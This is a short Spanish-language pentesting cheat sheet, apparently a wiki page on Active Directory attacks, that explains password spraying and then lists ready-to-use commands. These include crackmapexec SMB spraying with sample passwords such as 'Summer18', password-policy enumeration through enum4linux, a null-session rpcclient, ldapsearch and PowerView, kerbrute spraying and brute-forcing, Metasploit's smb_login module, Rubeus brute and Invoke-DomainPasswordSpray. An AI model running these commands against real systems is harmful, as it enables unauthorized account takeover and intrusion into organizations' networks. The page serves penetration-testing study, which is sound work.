Password Spraying

Qué es?

El Password Spraying es una técnica de ataque cibernético que consiste en probar una sola contraseña común o débil contra una gran cantidad de nombres de usuario. A diferencia de otros métodos de ataque de fuerza bruta que prueban muchas contraseñas en un solo usuario, el password spraying aplica una contraseña (generalmente una conocida por ser comúnmente utilizada o fácil de adivinar) en muchos usuarios. Esta técnica es efectiva en eludir políticas de bloqueo de cuentas que se activan tras varios intentos fallidos de acceso, ya que el ataque no supera el límite de intentos fallidos para un solo usuario. Es comúnmente utilizada en ataques contra sistemas de autenticación en línea, como interfaces de correo electrónico o servicios basados en la nube.

Comandos

Crackmapexe

crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18
crackmapexec smb 192.168.1.101 -u user1 -p password1 password2 password3

crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18
crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

Política de contraseñas

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10; 
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Kerbrute - Linux

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123

# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Metasploit

use scanner/smb/smb_login

Rubeus - Windows

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

DomainPasswordSpray - windows

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

Referencias

Password SprayingHackTricks

Password sprayingCrackMapExec ~ CME WIKI

AnteriorAtaques en AD SiguienteLLMNR Poisoning

Última actualización hace 1 año